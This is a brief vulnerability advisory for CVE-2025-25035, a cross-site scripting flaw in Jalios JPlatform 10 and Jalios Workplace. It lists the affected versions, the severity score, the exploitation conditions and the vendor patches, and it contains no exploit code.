CVE-2025-25035

CVE-2025-25035 is an Improper Neutralization of Input During Web Page Generation vulnerability, classified under CWE-79, enabling both Reflected and Stored Cross-Site Scripting (XSS) in Jalios JPlatform 10 and Jalios Workplace. The affected versions include JPlatform 10 prior to 10.0.8 (SP8), prior to 10.0.7 (SP7), and prior to 10.0.6 (SP6), as well as Jalios Workplace 6.2, 6.1, 6.0, and 5.3 through 5.5. The vulnerability has a CVSS v3.1 base score of 7.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N), indicating high severity due to its potential for significant confidentiality and integrity impacts.

Exploitation requires network access and low-privilege authentication, such as a standard user account, with low attack complexity but user interaction from a victim, such as clicking a malicious link or viewing crafted content. An attacker could inject malicious scripts into web pages, leading to reflected XSS for immediate execution on victim browsers or stored XSS for persistent attacks affecting multiple users. Successful exploitation enables high-impact outcomes, including theft of sensitive data like session cookies or credentials and unauthorized modification of page content or user data.

Vendor advisories, including the Jalios security alert at https://community.jalios.com/jcms/jc1_893720/en/security-alert-2025-02-19 and related issue trackers (JCMS-11246, JCMS-11248, JCMS-11259), detail mitigations through patches in the specified service packs, such as upgrading JPlatform 10 to 10.0.8 (SP8) or later equivalents. Additional guidance is available in the VulnCheck advisory at https://vulncheck.com/advisories/jalios-jplatform-xss. Security practitioners should verify configurations and apply updates promptly to affected deployments.